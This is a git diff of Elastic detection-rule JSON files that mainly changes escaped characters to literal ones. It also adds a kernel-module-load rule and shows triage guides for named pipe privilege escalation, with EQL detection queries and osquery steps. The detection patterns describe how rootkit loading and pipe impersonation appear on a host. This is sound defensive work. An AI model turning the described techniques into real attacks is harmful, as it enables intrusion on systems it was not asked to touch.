- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_105.json b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_105.json
index 86bdce9fd62..d6ed7605192 100644
--- a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_105.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
@@ -89,7 +89,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_106.json b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_106.json
index f134f0586c6..70d8c7ffd5f 100644
--- a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_106.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_107.json b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_107.json
index 776e707fa55..aaecc9d6336 100644
--- a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_107.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_208.json b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_208.json
index 29e3b14c05c..70c51cf73b3 100644
--- a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_208.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_1.json b/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_1.json
index 24598500299..8e61280fc80 100644
--- a/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_2.json b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_2.json
index 07eb2cd8c46..451adc1168e 100644
--- a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_2.json
@@ -96,7 +96,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -111,7 +111,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_3.json b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_3.json
index 0d6384fbd12..a7a4be2f54a 100644
--- a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_3.json
@@ -95,7 +95,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -110,7 +110,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_4.json b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_4.json
index e64290bf866..3b83d797097 100644
--- a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_4.json
@@ -96,7 +96,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -111,7 +111,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_1.json b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_1.json
index f340afacb4b..ba232aee63b 100644
--- a/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_1.json
@@ -45,7 +45,7 @@
 ],
 "risk_score": 21,
 "rule_id": "3e12a439-d002-4944-bc42-171c0dcb9b96",
- "setup": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n",
+ "setup": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. 
It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -79,7 +79,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_2.json b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_2.json
new file mode 100644
index 00000000000..cb1b11b98f7
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_2.json
@@ -0,0 +1,103 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "building_block_type": "default",
+ "description": "Detects the loading of a Linux kernel module through system calls. Threat actors may leverage Linux kernel modules to load a rootkit on a system providing them with complete control and the ability to hide from security products. As other rules monitor for the addition of Linux kernel modules through system utilities or .ko files, this rule covers the gap that evasive rootkits leverage by monitoring for kernel module additions on the lowest level through auditd_manager.",
+ "from": "now-9m",
+ "index": [
+ "auditbeat-*",
+ "logs-auditd_manager.auditd-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Kernel Driver Load",
+ "query": "driver where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \nevent.action == \"loaded-kernel-module\" and auditd.data.syscall in (\"init_module\", \"finit_module\")\n",
+ "related_integrations": [
+ {
+ "integration": "auditd",
+ "package": "auditd_manager",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "auditd.data.syscall",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "3e12a439-d002-4944-bc42-171c0dcb9b96",
+ "setup": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Defense Evasion",
+ "Rule Type: BBR"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1547",
+ "name": "Boot or Logon Autostart Execution",
+ "reference": "https://attack.mitre.org/techniques/T1547/",
+ "subtechnique": [
+ {
+ "id": "T1547.006",
+ "name": "Kernel Modules and Extensions",
+ "reference": "https://attack.mitre.org/techniques/T1547/006/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": 
"Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "3e12a439-d002-4944-bc42-171c0dcb9b96_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_102.json b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_102.json index d1cc6bc90e8..a065cc1b431 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_102.json +++ b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_103.json b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_103.json index 9ef15f4d099..a6d998d4d64 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_103.json +++ b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_103.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_104.json b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_104.json index 0538c336e17..b274a11ef80 100644 
--- a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_104.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_105.json b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_105.json
index ef00bfb9cda..88930c0d8fe 100644
--- a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_105.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_1.json b/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_1.json
index 31120a8f7c4..1653576d65b 100644
--- a/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_1.json
@@ -95,7 +95,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -117,7 +117,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_103.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_103.json
index 14563bed5ca..4306959c863 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_103.json
@@ -14,8 +14,8 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Privilege Escalation via Named Pipe Impersonation",
- "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \"\u003e\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n",
+ "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n",
 "references": [
 "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation",
 "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/",
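Review bot: Nothing in this change pins the exporter's escaping choice, so the `\u003e` → `>` flip seen in the `note` and `query` strings of this hunk (and `\u003c`/`\u0026` in the `setup` and `framework` hunks below, and in the `_104`, `_105` and `_106` copies of this rule) can flip back on the next export and regenerate the same noise across every historical snapshot. The decoded EQL query is byte-identical before and after, so detection behaviour is unaffected; the only thing that changes is the on-disk bytes, which is worth confirming nothing downstream keys on (a content hash or a rendered-diff check), since these files look like immutable exports of past rule versions. The `\u003c`/`\u003e`/`\u0026` pattern is characteristic of a JSON encoder's HTML-safe mode, so fix the setting at the source — for Go's encoding/json that is `enc.SetEscapeHTML(false)`, other encoders have an equivalent — and add a CI assertion that parses old and new files and compares them as JSON values rather than as text.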
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_104.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_104.json
index 2438fb59461..ef416b70012 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_104.json
@@ -14,8 +14,8 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Privilege Escalation via Named Pipe Impersonation",
- "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with 
Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified 